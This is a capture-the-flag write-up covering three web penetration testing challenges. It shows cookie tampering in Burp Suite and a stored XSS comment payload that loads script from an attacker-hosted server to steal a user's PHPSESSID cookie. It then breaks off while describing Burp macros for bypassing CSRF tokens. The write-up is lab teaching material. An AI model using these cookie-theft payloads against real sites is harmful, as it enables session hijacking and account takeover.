DEAD$HOT360°: Web Penetration Testing

Web Penetration Testing 1 – Club Status

Turn on the intercept of burp suit and go to the web site. Then you can see the GET request. There are two cookies called PHPSESSID and vip. Then we have to edit the vip cookie value from 0 to 1 and forward the request.

Then you can see the page with the available Blog link. Then click the Blog link and the flag for this challenge is revealed.

1) Web Penetration Testing 2 – Om nom nom nom

After completing challenge 1, you can browse in the Blog page. There is a user called Sycamore. Then go to the blog of Sycamore and there is a comment box. We can put comments on it. Then we have to find the vulnerabilities of this comment box.

Type [<script>alert(“xss”)</script>](xss) in the comment box and submit it. You can see the alert message.

That’s it. We found the XSS vulnerability. The next step is to steal the PHPSESSID cookie of Sycamore. To do that, we have to host a server. We can create a file name .j containing some JavaScript to steal the user cookie. We can use pythons SimpleHTTPServer to host it on port 80.

Now we can create a XSS payload for the comment field. It looks like this.

[<script src=//<IP>/file.j>](test)

Add this comment to the blog page and wait some time. After a small time we can see the entries in the python server like this.

From that, we can get the cookie value of Sycamore. By loading the page with the cookie value we got from the server, the flag is revealed.

1) Web Penetration Testing 3 – Nonce-sense

After looking around the site while logged in as Sycamore, we notice that users can delete comments. The CSRF token prevents automated tools from testing payloads. Burp has a feature for this using macros.

We need to setup burp with a new session handling rule, record a macro and use it to generate new CSRF tokens for requests.